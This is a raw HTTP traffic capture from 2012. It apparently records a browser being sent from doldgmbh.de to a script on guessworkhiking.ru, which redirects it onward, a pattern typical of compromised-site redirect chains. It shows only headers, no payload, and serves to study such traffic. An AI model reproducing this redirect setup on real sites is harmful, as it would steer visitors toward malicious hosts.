User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: &quot;87de33-256-4cd617ed12480&quot;
Accept-Ranges: bytes
Content-Length: 598
Date: Thu, 08 Nov 2012 00:55:36 GMT
Connection: keep-alive
GET / HTTP/1.1

Host: www.thelocal.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:36 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /IMG/jpg/rubon20-2.jpg HTTP/1.1

Host: www.gevelot-extrusion.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Set-Cookie: 240plan=R915180027; path=/; expires=Sat, 10-Nov-2012 12:57:17 GMT
Date: Thu, 08 Nov 2012 00:55:36 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 27 Nov 2009 08:06:14 GMT
Etag: &quot;a06e7e-8f83-47955c404c04a&quot;
Accept-Ranges: bytes
Content-Length: 36739
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /maxstacksizedetracted.cgi?8 HTTP/1.1

Host: guessworkhiking.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 00:58:00 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Fri, 09-Nov-2012 00:58:00 GMT; path=/; domain=guessworkhiking.ru
Location: http://www.thelocal.de/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET / HTTP/1.1

Host: www.thelocal.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:36 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 237
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /maxstacksizedetracted.cgi?8 HTTP/1.1

Host: guessworkhiking.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 00:58:00 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Fri, 09-Nov-2012 00:58:00 GMT; path=/; domain=guessworkhiking.ru
Location: http://www.thelocal.de/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET / HTTP/1.1

Host: www.thelocal.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:36 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 237
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /maxstacksizedetracted.cgi?8 HTTP/1.1

Host: guessworkhiking.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 00:58:00 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Fri, 09-Nov-2012 00:58:00 GMT; path=/; domain=guessworkhiking.ru
Location: http://www.thelocal.de/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET / HTTP/1.1

Host: www.thelocal.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:37 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 237
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /maxstacksizedetracted.cgi?8 HTTP/1.1

Host: guessworkhiking.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 00:58:00 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Fri, 09-Nov-2012 00:58:00 GMT; path=/; domain=guessworkhiking.ru
Location: http://www.thelocal.de/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET / HTTP/1.1

Host: www.thelocal.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:37 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 237
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:37 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
GET /favicon.ico HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 00:55:39 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en